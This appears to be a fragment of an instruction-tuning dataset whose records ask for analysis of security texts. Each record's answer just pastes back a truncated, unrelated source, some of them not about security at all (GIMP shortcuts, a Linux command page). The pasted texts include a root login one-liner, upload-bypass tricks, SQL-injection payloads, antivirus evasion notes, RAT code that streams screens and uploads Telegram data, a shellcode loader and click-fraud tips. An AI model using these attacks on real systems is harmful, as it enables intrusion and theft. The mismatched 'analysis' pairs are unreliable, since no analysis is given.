SPECIAL STOP  RUNS PLUGINS.REXX  LISTS SURROGATS  CHECKS THAT SURROGATS HAVENT BEEN VISITED YET  IF *.SUBMIT > SUBM.REXX  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLIFE OF CODER QUESTION 1 int a = 5, b = 7, c; c = a+++b; (A) A=6, C=10 (B) B=7, C=10 (C) A=6, C=12 QUESTION 2 char str[]=\"startrek\"; char *p=str; int n=10; A=sizeof(str); B=sizeof(p); C=sizeof(n); (A) A=8, C= 4 (B) B=4, C=1 (C) A=9, C=4 QUESTION 3 unsigned long *i; unsigned long *j; unsigned long sum; sum=0; i = 1000; j = 3000; for(; i < j; i+= sizeof(unsigned long)) { sum++; } (A) sum=2000 (B) sum=500 (C) sum=125 ENTERPRISE NC-1701 void sys_wrapspeed() { starship_status = get_starship_status(); if (starship_status == STOP) { disable(\"FIXATOR\"); disable(\"BREAK\"); disable(\"THRUSTER\"); disable(\"IMPULSE\"); } do_wrapspeed(); } FREEBSD LIBEXEC/RTLD-ELF/RTLD.C void _rtld () { trust = !issetugid(); if (!trust) { unsetenv(LD_ \"PRELOAD\"); unsetenv(LD_ \"LIBMAP\"); unsetenv(LD_ \"LIBRARY_PATH\"); unsetenv(LD_ \"LIBMAP_DISABLE\"); unsetenv(LD_ \"DEBUG\"); unsetenv(LD_ \"ELF_HINTS_PATH\"); } return; } ID4, 1996 The gift alien gave SOB BBS remote overflow exploit Sendmail local root exploit - Ghost5, 1997  inetd telnetd login bbsrf bbsd telnet telnet RFC931(ident) RFC931 RFC931 RFC931 RFC931 AIX - MAY, 1994 When I told one of our on-site IBM droids about this, he didn't believe it. \"No way, the goverment buys these machines because they're Class B secure!\" So I showed him... I also saw an IBM spokesperson describe this in a trade publication as requiring \"a complex series of commands\". - Mark Scheuern % rlogin -l -froot aix.machine # SUNOS - FEB, 2007 0day was the case that they gave me - kingcope inetd telnetd login shell telnet -fbin -fbin -f bin /* * If we're handed a bigger struct than we know of, * ensure all the unknown bits are 0. */ if (size > sizeof(*attr)) { unsigned long val; unsigned long __user *addr; unsigned long __user *end; addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr), sizeof(unsigned long)); end = PTR_ALIGN((void __user *)uattr + size, sizeof(unsigned long)); for (; addr < end; addr += sizeof(unsigned long)) { ret = get_user(val, addr); if (ret) return ret; if (", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: GIMP date: 2022-11-23 16:23:31.696743 background: bg-[#554f42] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 97 keyboard shortcuts found in GIMP --- Keyboard Shortcuts ------------------ ### Toolbox {.row-span-2} Shortcut | Action ---|--- `R` | Rectangle select `E` | Ellipse select `F` | Free select `U` | Fuzzy select `Shift` `O` | Select by color `I` | Scissors `B` | Paths `O` | Color picker `M` | Move `Shift` `C` | Crop and resize `Shift` `R` | Rotate `Shift` `T` | Scale `Shift` `S` | Shear `Shift` `P` | Perspective `Shift` `F` | Flip `T` | Text `Shift` `B` | Bucket fill `L` | Blend `N` | Pencil `P` | Paintbrush `Shift` `E` | Eraser `A` | Airbrush `K` | Ink `C` | Clone `V` | Convolve `S` | Smudge `Shift` `D` | Dodge or burn `X` | Swap colors `D` | Default colors {.shortcuts} ### File Shortcut | Action ---|--- `Ctrl` `N` | New image `Ctrl` `O` | Open image `Ctrl` `Alt` `N` | Open image as new layer `Ctrl` `D` | Duplicate image `Ctrl` `1-0` | Open recent image 1-10 `Ctrl` `S` | Save image `Ctrl` `S` | Save image under a new name `Ctrl` `Q` | Quit {.shortcuts} ### Dialogs Shortcut | Action ---|--- `Ctrl` `L` | Layers `Ctrl` `Shift` `B` | Brushes `Ctrl` `Shift` `P` | Patterns `Ctrl` `G` | Gradients `Ctrl` `Shift` `T` | Tool options `Ctrl` `P` | Palettes `Ctrl` `Shift` `I` | Info window `Ctrl` `Shift` `N` | Navigation window `Tab` | Jump to next widget `Shift` `Tab` | Jump to previous widget `Enter` | Set the new value `Space` | Activate the current button or list `Ctrl` `Alt` `PgUp` | In a multi-tab dialog, switch tabs `Shift` `L` | Open location `Alt` `Up` | Up folder `Alt` `Down` | Down folder `Alt` `Home` | Home folder `Esc` | Close dialog {.shortcuts} ### View Shortcut | Action ---|--- `F10` | Main menu `Shift` `F10` | Drop-down menu `F11` | Toggle fullscreen `Shift` `Q` | Toggle quickmask `Ctrl` `W` | Close document window `+` | Zoom in `-` | Zoom out `1` | Zoom 1:1 `Ctrl` `E` | Shrink wrap `Ctrl` `Shift` `E` |", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Upload Insecure Files > Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Summary * [Tools](#tools) * [Exploits](#exploits) * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) * [Picture compression](#picture-compression-) * [Configuration Files](#configuration-files) * [CVE - ImageMagick](#cve---imagemagick) * [CVE - FFMpeg](#cve---ffmpeg) * [ZIP Archive](#zip-archive) * [Jetty RCE](#jetty-rce) * [References](#references) ## Tools - [Fuxploider](https://github.com/almandin/fuxploider) - [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) - [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/) ## Exploits ### Defaults extensions * PHP Server ```powershell .php .php3 .php4 .php5 .php7 # Less known PHP extensions .pht .phps .phar .phpt .pgif .phtml .phtm .inc ``` * ASP Server ```powershell .asp .aspx .config .cer and .asa # (IIS <= 7.5) shell.aspx;1.jpg # (IIS < 7.0) shell.soap ``` * JSP : `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .actions` * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` * Node.js: `.js, .json, .node` ### Upload tricks - Use double extensions : `.jpg.php, .png.php5` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` - Random uppercase and lowercase : `.pHp, .pHP5, .PhAr` - Null byte (works well against `pathinfo()`) * `.php%00.gif` * `.php\\x00.gif` * `.php%00.png` * `.php\\x00.png` * `.php%00.jpg` * `.php\\x00.jpg` - Special characters * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. * Whitespace and new line characters * `fi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Illuminati (Web, 200p) ###ENG [PL](#pl-version) In the task we get access to a Illuminati recruitment webpage. However the recruitment is closed and we can only send messages to the admin and he might accept us. We could see only our own messages. Our first assumption was that it's some standard XSS attack on the admin, but placing some example XSS payload in the form uncovered an SQL error printed. This meant we have an SQL Injection vulnerability. The form had 2 fields: - subject limited to 40 characters (verified server side) - message with no length limit Both of them were exploitable with a `\"`. The injection point was an `INSERT INTO` query, which limited a bit our capabilities. More so that initially we though we have to exploit the `subject` field doing some crazy SQL golfing in 40 characters, since we could not inject a `select` into the second field due to query construction. The query was something like: `insert into requests (id, \"$subject\", \"$message\")` Which means that the message field content was either inside quotation marks, or if we close the quotation mark, already outside insert query. We could chain another insert values but we didn't know the ID and thus we would not see the contents of this second insert query. For a moment we though we will have to make a blind sqli here, but fortunately we came up with a great idea - why not chain injections from both fields at the same time, putting an injection in `subject` which will `shift` the column to the `message` field, lifting the 40 characters limit. We figured we can put for example the subject as: ``` theSubject\",concat( ``` and message as: ``` ,(select whatever we want)))# ``` And therefore we escape the quotation marks by concat of empty string and our query result! This way we could now execute any query we wanted, so we dumped the whole database via group_concat and substring. The passwords, including the admin password, were hashed and not likely to be broken. Rest of the database did n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 13 Shmoo-Fu: Hacker Goo, Goofs, and Gear with the Shmoo The Shmoo Group www.shmoo.com DefCon 13 Stickers anyone? DefCon 13 What's up Shmoo?  Howdy & introductions...  Our festivities will include:  Super Spy Stuff  IDN Fallout & Homograph Attacks for Personal Identities  Revving Up Rainbow Tables  Rogue Squadron & EAP Peeking  Shooting Your Security Wad  Don't Try This at Home  And MORE! DefCon 13 Super Spy Stuff  Robots got boring, so Pablos starting hanging out with models after his chic hacker photo shoot in FHM.  The result was nothing short of spectacular, as the fashionable cell-phone stowaway strifes hot women face were finally addressed. DefCon 13 DefCon 13 And now... Pablos. DefCon 13 DefCon 13 3ricj? DefCon 13 IDN Fallout  At ShmooCon 2005, Eric Johansen dropped the browser bomb regarding IDN issues.  The press ran with it a bit.  The folks responsible for IDN ranted for a bit.  But did anything concrete occur?  And where are we now? DefCon 13 Dan Moniz goes crazy... DefCon 13 rainbowtables.shmoo.com  We think rainbow tables are neat.  Just for fun, we started hosting rainbow tables that we had generated.  LanMan  Via Bittorrent  FREE  Some people liked that. Yay!  Some people didn't... DefCon 13 ---------- Forwarded message ---------- From: Zhu Shuanglei <shuanglei@hotmail.com> Date: Mar 10, 2005 12:42 AM Subject: About your shmoo site To: beetle@shmoo.com Hi, I am Zhu Shuanglei, the author of RainbowCrack software. I notice you are offering free BitTorrent links on your website for the rainbow tables. For those guys selling the table without permission from me, they are not welcome. But you are worse. As you may know, I develop the rainbowcrack tool and release it the the public for free. I just want to introduce the technique to the world and those need it can benifit from this software. If I sell the tables, I am only making some money for my work and for the fee of hosting my website and for my computing resource. This should be quite reasonabl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA.B.U技术漫谈笔记 pdf版没有索引图这里我贴上更直观点 ABU东西很多远不止此期待其他师傅们的分享同时 师傅们如果有挖掘LOLbins的思路麻烦分享下 一.介绍 参考: RedCore A.B.U视频教程 # A.B.U 意义 A.B 活下来U 活下去反监控反溯源反日志反取证 活多久的问题 # A.B.U 目的 反查杀 二.分类 1. 范式A.B.U 1.1静态A.B.U 1.1.1 文件A.B.U 磁盘文件 1加密解密项目推荐 C/C++ WjCryptLib库 MD4AES等 一个.c文件对应一个.h文件 https://github.com/WaterJuice/WjCryptLib Cipher https://github.com/mygityf/cipher Donut 强烈推荐 读懂源码=受益匪浅 https://github.com/TheWover/donut 2加密解密项目推荐 C# NETCore.Encrypt https://github.com/myloveCc/NETCore.Encrypt Bing.Encryption https://github.com/bing-framework/Bing.Encryption EasyNet https://github.com/TheWover/EasyNet StreamCryptor # A Anti ############## # Anti 反对抗 主动式对抗 挑衅,对挑衅的对象造成\"伤害\" unhook # ############## # B Bypass ############## # Bypass 被动式绕过 加解密编码混淆 # ############## # U UnDetection ############## # UnDetection 伪装自己 掩人耳目隐匿行踪 # ############## # 通用方式对大部分AV,EDR都有一定效果但是针对某几个AV,EDR效果差 1. source code 修改源码特征等 (c/c++, c# ros 动态语法分析 自动化打乱) 2. binary 强加密方式 A.B.U 随机密钥: windows自带的 CryptAPI https://github.com/bitbeans/StreamCryptor 1.1.2 内存A.B.U 内存映像 (1) Native Dll/Exe Native PE文件 内存特征码扫描 (2) 自解密技术 # 静态内存A.B.U 文件始终要运行的解密还原之后就原形必露了 1. 加花junk code 混淆 obfascation C/C++ assembly 能力 jmp @F // jmp跳转指令 db junkcode // junk code 花指令更绚烂 @@ 2. obfascation 混淆 一般针对AV还有一种针对反汇编逆向而存在的 一旦你的样本落到了样本分析人员基本就game over. 关键位置混淆 1.病毒的自解密 2.内存页的属性要求 RWX 高风险 3.CPU空闲多某个进程内存操作时会扫描一下刚才拷贝内存的数据 关键API函数 VirtualAlloc VirtualProtect CopyMemmory (3) 项目推荐 pescrambler https://github.com/CoolOppo/pescrambler nullsecuritynet/tools https://github.com/nullsecuritynet/tools hyperion https://github.com/hyperion-project/hyperion @@@ 汇编器 Tasm Masm Nasm Fasm @@@Nasm shellcode生成 @@@ windows系统推荐 Masm (4) .Net assembly /PE 中间语言IL Code===CLR 运行环境 MSIL 可进行强混淆 强加密(去除特征效果很好) 特性 .dll /.exe 混淆本身不是为了静态免杀而是为了反调试 逆向 (5) 项目推荐 (强混淆 强加密(去除特征效果很好)) ConfuserEx (该项目已封存衍生开发也不错) https://github.com/yck1509/ConfuserEx ConfuserEx2 mkaring https://github.com/mkaring/ConfuserEx/releases obfuscar https://github.com/obfuscar/obfuscar koivm https://github.com/Loksie/KoiVM-Virtualization ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Google AdWords Dont be evil my ass By: StankDawg What is Google AdWords?  Google Advertising Program  Pay Per Click  Customizable  Used by:  Gmail  Google Groups  Adsense  etc How does it work?  20 bucks up front  $5 activation fee  $15 Credit towards account  Pay per click  Bidding system  Minimum .05  Maximum daily value can be set  Higher bids = better results How does it work?  Campaigns  Logical Units  Multiple campaigns for webmasters of multiple sites  Ad Groups  Many inside each campaign.  Examples:  Cars (One ad for NEW, one ad for USED)  My site (One for Radio, one for Magazine, etc) Whats the problem?  Reactivation fees  Slowed accounts  Without warnings!  2 grace violations, then $5 fee  Terms of Service  No Hacking or Cracking  They do not differentiate between H/C  Hypocrisy  Hacking is invalid yet Define:Hacker on Google gives many correct definitions.  Keyword tool suggest invalid keywords!  I cant advertise Hacking, but ebay and Amazon can!  Google may ban hacker but other sites that are powered by their AdWords engine DO NOT! What can you do?  Reactivate your ads  Ads are put into rotation immediately!  Modify your ads by making one small change  Delete the keywords then Add them back!  Daily limit  Click the hell out of ads of sites you dont like (using proxies and/or scripts)  Use words that you know are invalid Tricks!  Misspellings  Get hits before the real ads!  Cheaper (.05 minimum) Tricks!  Use proper names  Coke use Pepsi, Ford use Chevrolet, etc Tricks!  Use general Google hacking techniques  Bust anyone who is Google hacking! Other Interesting Applications  Passing hidden messages?  80 character limit to keywords  Public key?  Secret key only for the person who knows what to find.  And yes, there is a hidden message there. ;) Other Interesting Applications  Misleading People Other Interesting Applications  Misleading People Other Interesting Applications  Never piss off a hacker! Other Interesting Applications  Never piss off a ha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n后渗透收集 参考链接 https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live- streaming.html 表格 整理了BIOPASS RAT所做的动作 此模块部分不可用请升级帐户后使用 AutoRun 为持久性创建计划任务 调用pythoncom进行 OpenEverything Downloads and runs Everything from voidtools 会下载官方 everything启动后使 用ShowWindow隐藏 窗口everything启动 后会启动一个http用于 查询 但是可能需要bypass uac 关闭则执行 TASKKILL /F /IM Everything.exe OpenFFmpegLive Downloads and runs FFmpeg (for screen video capture) 下载ffmpeg之后,执行 win32api .ShellExecute (0 ,'open',filename ,' -f gdigrab -i desktop - draw_mouse 0 - pix_fmt yuv420p - vcodec libx264 -r 5 - b:v 1024k -bufsize 1024k -f flv \" {}\"'.format (config.parameters ['push_url']),os.getenv ('public'),0 )#line:934 push_url 为阿里云的地 址 https://help.aliyun.co m/document_detail/4 4304.html command A behavior B comment C 1 2 就可以时时监控屏幕了 Open_Obs_Live Downloads OBS Studio and starts live streaming 下载开源的obs studio 监控 SnsInfo Lists QQ, WeChat, and Aliwangwang directories path .join (path .expanduser ('~'),'Documents','Tenc ent Files') path .join (path .expanduser ('~'),'Documents','WPS Cloud Files') 微信可以用注册表查 (winreg .HKEY_CURRENT_USER ,r\"SOFTWARE\\Tencent \\WeChat\") FileSavePathz字段 路径再加上 WeChat Files 阿里旺旺 [r'Program Files (x86)\\AliWangWang\\p rofiles',r'\\Program Files\\AliWangWang\\pr ofiles'] InstallTcpdump Downloads and installs the tcpdump tool PackingTelegram Compresses and uploads Telegram's tdata directory to cloud storage O0OOOOO000000O0 OO =subprocess .Popen (\"cmd.exe /c wmic process where name='telegram.exe' get ExecutablePath\",shell =True ,stdout =subprocess .PIPE )#line:1520 OOOOOOOOOOOOO 00OO =O0OOOOO000000O 3 4 0OO .stdout .readlines ()#line:1521 O0OOO000000O00O0 0 =os .path .join (os .getenv ('temp'),'telegram_{}.zi p'.format (time .time ()))#line:1522 OOO0OO0OOOO000 O0O ={\"src_paths\": [],\"dst_zipfile\":O0OOO 000000O00O00 ,\"includes\":\"\",\"exclude s\":\"emoji|user_data\",\" maxsize\":10 *1024 *1024 ,}#line:1529 OpenProxy Downloads and installs the frp proxy client in the %PUBLIC% folder frpc.exe OpenVnc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurityTube.net Chellam  a Wi-Fi IDS/Firewall for Windows SecurityTube.net Vivek Ramachandran WEP Cloaking Defcon 19 Caffe Latte Attack Toorcon 9 Microsoft Security Shootout Wi-Fi Malware, 2011 802.1x, Cat65k Cisco Systems B.Tech, ECE IIT Guwahati Media Coverage CBS5, BBC Trainer, 2011 SecurityTube.net SecurityTube and Pentester Academy SecurityTube.net Motivation  Attack! Attack! Attack!  Defense?  Important problem?  Solution viable? SecurityTube.net Enterprise Premise Focused Enterprise SecurityTube.net Roaming Clients?  State of current solutions  Lockdown Wi-Fi, Bluetooth etc.  Policy based on SSID  Not BYOD ready  No Attack detection  Heterogeneous Devices  Varied Operating Systems  Non standard Wi-Fi API  No low level support e.g. iOS SecurityTube.net What about the rest of us?  World beyond Enterprise  Millions of Personal Devices  Every Internet capable device  Internet Of Things (IoT) SecurityTube.net Wi-Fi Client Attack Surface  Honeypots  AP-less WEP/WPA/WPA2 Cracking  Evil Twins  Mis-Associations  Hosted Network Backdoors   SecurityTube.net Typical Attack SSID1 SSID2 SSID3 SSID1 SSID2 SSID3 SecurityTube.net AP-less Cracking No Encryption WEP WPA/WPA2 PSK WPA/WPA2 PEAP, EAP-TTLS AP-less Cracking Cloud Cracking  Caffe Latte  Hirte Handshake, MS-CHAPv2 CR SecurityTube.net Where are you SAFE? Nowhere!!! SecurityTube.net Hijack Wi-Fi == Hijack Layer 2  Traffic Monitoring  DNS Hijacking  SSL MITM  Application Attacks SecurityTube.net Defining the Scope  Windows Endpoints  No custom hardware or drivers  Detect Honeypot creation Tools  Firewall like Rule Creation  Allow, Deny  Monitoring Wi-Fi state machine  Detect Wi-Fi backdoors SecurityTube.net Architecture Block Diagram Wi-Fi Native API State Machine Scan Data Network Profiles Card Control Data Collection Engine Event Data BSS Information Profile XML Data Hardware State Data Data Storage Analysis Engine Rule Matching Engine Presentation Layer Interface Application GUI SecurityTube.net Wi-Fi Native API Wi-F", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Your logo here  Robert RSnake Hansen - CEO  SecTheory LLC  http://www.sectheory.com  http://ha.ckers.org  the lab  http://sla.ckers.org  the forum  Joshua JabraAbraham  Rapid7 LLC - Security Researcher  http://www.rapid7.com  http://blog.spl0it.org 2 3  Why does this matter?  Privacy advocacy  People think theyre safe  Privacy is not a guarantee. It can be taken from you.  True anonymity is actually extremely difficult to achieve!!  So we decided to attack users instead of websites for once. 4  Safety from trolls who want to drop docs  Safer for political dissidents  Safer for potential victims of violent crimes (women, children)  Allows people to be themselves (for good or bad)  Safer for whistle blowers  Increases freedoms 5  Haven for evildoers  Allows them to attack easily  Allows them to retreat easily  Allows them to exfiltrate data easily  Hurts law enforcement  Prevents social compact rules of order from working in online contexts. 6  The ecosystem is too complex  IP is the gold standard for tracking people down on the Internet, but what if we could do better?  Lets start with the basics of how people anonymize themselves. 7  Basic anonymization guide  Proxies:  CGI proxies  SOCKS Proxies  Tor  Hacked machines  Freemail  Hotmail  Gmail  Hushmail 8  Good/Normal Use  Improving the trust model  Client: has the cert in the browser  Servers: requires all clients have valid certs  What if the client goes to another website with SSL?  Browser defaults to send the public key  Well, could this be malicious?  Sniff the public key  Information  System/OS  Usernames/Emails  Data correlation  Tie a user back to a system 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png 10  100 embassy passwords  Breach proxy honeypots  Open Proxies you trust?  HackedTor.exe  Setup the Client  Tor node just logs everything  We can play MiTM like Jay Kazakhstan Embassy in Egypt 213.131.64.229 kazaemb piramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongol", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPrivacy in DSRC connected vehicles Defcon 21  August 3, 2013 whoami  BSEE, digital communications  Many years as a network engineer  Santa Clara University Law student  Research assistant providing technical expertise on privacy audits and reviews  Contracted by auto consortium to review privacy of proposed vehicle to vehicle safety network Standard Disclaimer IANAL (Yet) But if you know anyone looking for summer interns.... Non-Standard Disclaimer A current NDA covers some of my work here (but not very much) The focus will be on published information and standards. What is This Project?  DSRC: Dedicated Short Range Communications  (Where short == 380m)  Vehicle to Vehicle  Vehicle to infrastructure - Not having to wait for a light on an empty street again. - Better traffic planning for better cities and roadways. Why is It being Developed? Safety Photo Credit: Jason Edward Scott Bain How the safety features work Non-trivial Impact on Auto Deaths  World Health Organization estimates 25% of vehicle deaths each year can be prevented.  Fatigue and distracted driving accidents reduced.  Blind Corners, fog and limited visibility accidents reduced. Photo: Public Domain Will This really Happen? IT ALREADY IS How Soon?  Hardware is already being shipped.  Software issues still entirely in the air  More is being done in software these days.  The US Dept. of Transportation is considering mandating this for all new cars. (Decision to come later this year.)  Has already deployed in trucks in Europe What is DSRC  Basic safety messages sent out every 1/10 seconds.  All message carry a standard glob: values for pre-defined vehicle trajectory and operational data.  Cars process data and warn driver.  Equipment integrated into vehicle Photo Credit: US Dept. of Transportation AfterMarket Installation A little cumbersome Photo Credit: NIST What DSRC is not  CANbus  OnStar (or any other remote service)  (Direct) support for autonomous driving mechanisms. Photo Credit: US Dept. of Transpo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n浅谈syscall Author袍 简介 Syscall 即 system call 是最近在红队领域较热的种法主要来规避AVEDR类 的设备检测 Windows有两种处理器访问模式户模式和内核模式使Ring级来描述就是户模式为 Ring 3内核模式为Ring 0如图 户的代码运在户模式下驱动程序和操作系统代码运在内核模式下两者相互隔 离避免户级别的代码影响到操作系统的稳定 户在调些与系统相关的API函数时实际上是先从户模式切换到内核模式调结束 后再回到户模式通过 Process Monitor 可以看到这个过程 户代码调 CreateFile() 它由 Kernel32.dll 导出这显示为 KernelBase.dll 是因为 Windows 7和Windows Server 2008 R2开始微软将些功能进了重定位具体新 Low- Level 进制件 - Win32 apps | Microsoft Docs 可以看到之后调了 ntdll.dll 的 ZwCreateFile() 有时候是 NtCreateFile() 两者对此处 代码来说区别不 进内核模式后还能看到调了 ntoskrnl.exe 的 NtCreateFile() 这次调和上次有什 么区别 使WinDbg来反汇编 ntdll!NtCreateFile : 0:001> x ntdll!NtCreateFile 00007ffc`6388d800 ntdll!NtCreateFile (NtCreateFile) 0:001> u 00007ffc`6388d800 ntdll!NtCreateFile: 00007ffc`6388d800 4c8bd1 mov r10,rcx 00007ffc`6388d803 b855000000 mov eax,55h 00007ffc`6388d808 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 00007ffc`6388d810 7503 jne ntdll!NtCreateFile+0x15 (00007ffc`6388d815) 00007ffc`6388d812 0f05 syscall 00007ffc`6388d814 c3 ret 00007ffc`6388d815 cd2e int 2Eh 00007ffc`6388d817 c3 ret 可以看到 ntdll!NtCreateFile 常简短先将函数参数放寄存器之后将 CreateFile() 对应的系统服务号 0x0055 放 eax 中微软没有公开这些服务号的对应关系但有佬整理 了份Windows X86-64 System Call Table (XP/2003/Vista/2008/7/2012/8/10). 之后有个 syscall 指令X86系统使 sysenter 它将把函数参数复制到内核模式寄存器 中再执 CreateFile() 的内核版本调完成后返回值给户模式的应程序 现在可以得到答案了 ntdll.dll 的 NtCreateFile() 仅仅只是层封装真正的实现在 ntoskrnl.exe 中 使Syscall 许多EDR类防护设备会对敏感的API进hook但有可能只是hook了Ring 3级别的API通过 直接进系统调就能绕过hook. 1. 剖析函数定义 以个简单的shellcode加载器为例 #include \"stdafx.h\" #include \"Windows.h\" int main() { unsigned char shellcode[] = \"\"; // calc x64 void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shellcode, sizeof shellcode); CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, NULL); Sleep(1000); return 0; } 观察 CreateThread() 的调栈 依次为 kernel32!CreateFile -> KernelBase!CreateRemoteThreadEx -> ntdll! NtCreateThreadEx 利IDA打开 kernel32.dll 能看到 CreateFile 实际上是 CreateThreadStub 调了 CreateRemoteThreadEx  同样打开 KernelBase", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIts assembler, Jim, but not as we know it! Morgan Gangwere DEF CON 26 Hello, Im Morgan Gangwere and this is Its assembler, Jim, but not as we know it! Were going to be looking at some fun shenanigans you can have with embedded devices running Linux (and other things) 1 Dedication Never forget the shoulders you stand on. Thanks, Dad First a shout-out to my father. Hes an awesome man who taught me the importance of understanding tools and then making your own. This is him using a chisel with just one hand  and a tool. 2 whoami Hoopy Frood Been fiddling with Linux SOCs since I fiddled with an old TS-7200 EmbeddedARM board Ive used ARM for a lot of services: IRC, web hosting, etc. Ive built CyanogenMod/LineageOS, custom ARM images, etc. So who am I? Im the hoopiest frood that ever did cross the galaxy, been doing Linux-y stuff since I was a wee lad making off with one of my fathers dev kits, and Ive built my own tools for some time. 3 A word of note There are few concrete examples in this talk. Im sorry. This sort of work is One part science One part estimation Dash of bitter feelings towards others Hint of What the fuck was that EE thinking? A lot comes from experience. I can point the way, but I cannot tell the future. Theres a lot of seemingly random things. Trust me, Itll make sense. 4 ARMed to the teeth From the BBC to your home. So lets talk about ARM. 5 Short history of ARM Originally the Acorn RISC machine Built for the BBC Micro! Acorn changed hands and became ARM Holdings Acorn/ARM has never cut silicon! Fun fact: Intel has produced ARM- based chips (StrongARM and XSCale) and still sometimes does! The ISA hasnt changed all that much. ARM, the Acorn RISC Machine, was built for the BBC Micro in 1985 by Acorn Computer, predominantly designed by the hands of Sophie Wilson. Later, ARM was changed to Advanced RISC machine, and later into simply ARM. The ARM ISA has stayed the same since ARM2.. Mostly. Theres been changes to keep up with the time, but you could read ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfold === 控制文件内容输出时所占用的屏幕宽度 ## 补充说明 **fold命令** 用于控制文件内容输出时所占用的屏幕宽度fold命令会从指定的文件里读取内容将超过限定列宽的列加入增列字符后输出到标准输出设备若不指定任何文件名称或是所给予的文件名为-则fold指令会从标准输入设备读取数据 ### 语法 ```shell fold(选项)(参数) ``` ### 选项 ```shell -b或bytes以Byte为单位计算列宽而非采用行数编号为单位 -s或spaces以空格字符作为换列点 -w<每列行数>或--width<每列行数>设置每列的最大行数 ``` ### 参数 文件指定要显示内容的文件 ### 示例 ```shell fold -w 5 filename ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOffensive Windows IPC Internals 2: RPC Contents: The Series Introduction History RPC Messaging RPC Protocol Sequence RPC Interfaces RPC Binding Anonymous & Authenticated Bindings Registration Flags Security Callbacks Authenticated Bindings Well-known vs Dynamic Endpoints RPC Communication Flow Sample Implementation Access Matrix Attack Surface Finding Interesting Targets RPC Servers RPC Clients Unauthorized Access Client Impersonation Server Non-Impersonation MITM Authenticated NTLM Connections MITM Authenticated GSS_NEGOTIATE Connections References The Series This is part 2 of my series: Offensive Windows IPC Internals. If you missed part one and want to take a look, youll find it here: Offensive Windows IPC Internals 1: Named Pipes. Part 2 was originally planned to be about LPC & ALPC, but as it turns out its quite time consuming to dig out all the undocumented bits and tricks about these technologies. Therefore i made the discussion to publish my knowledge about RPC first before turning my head towards ALPC once again. The reason why i originally planed to publish LPC & ALPC before RPC is because RPC uses ALPC under the hood when used locally and even more: RPC is the intended solution for fast local inter process communication as RPC can be instructed to process local communication via a special ALPC protocol sequence (but youll find that out while reading on). Anyhow, the lesson here is (i guess) that sometimes its better to pause on a thing and get your head cleared up and make progress with something else before you get lost in something that is just not ready to reveal its mysteries to you. Get a coffee and a comfy chair and buckle up for RPC Introduction Remote Procedure Calls (RPC) is a technology to enable data communication between a client and a server across process and machine boundaries (network communication). Therefore RPC is an Inter Process Communication (IPC) technology. Other technologies in this category are for example LPC, ALPC or Named Pipe", "category": "text_analysis", "source": "security_papers"}
